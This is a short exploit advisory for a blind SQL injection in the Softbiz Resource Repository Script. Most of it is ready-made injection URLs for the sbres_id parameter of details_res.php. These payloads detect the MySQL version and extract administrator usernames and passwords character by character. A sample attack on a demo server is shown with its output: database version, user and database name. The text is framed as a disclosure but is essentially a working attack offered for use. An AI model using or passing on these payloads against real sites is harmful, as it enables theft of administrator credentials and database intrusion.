Softbiz Resource Repository Script Blind SQL Injection Vulnerability

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ Softbiz Resource repository script Blind SQL Vulnerability (Normal version) $ Author : Sangteamtham $ Home : Hcegroup.net & vnbrain.net $ Download :http://www.softbizscripts.com/FAQ-script-features.php $ $****************************************************************************************** $ $ check version : /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=4 $ /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=5 $ /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/* $ /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/* $ note: password_column,username_column,admin_info_table depend on the database installed $*********************************************************** $ Demo: $ In the demo site : $ $ Exploit: $ http://server/resource/details_res.php?sbres_id=121%20and%20substring(@@version,1,1)=5 $ MySQL version: 5.0.81-community $ User: softbiz_kuber@localhost $ Dataabase: softbiz_resource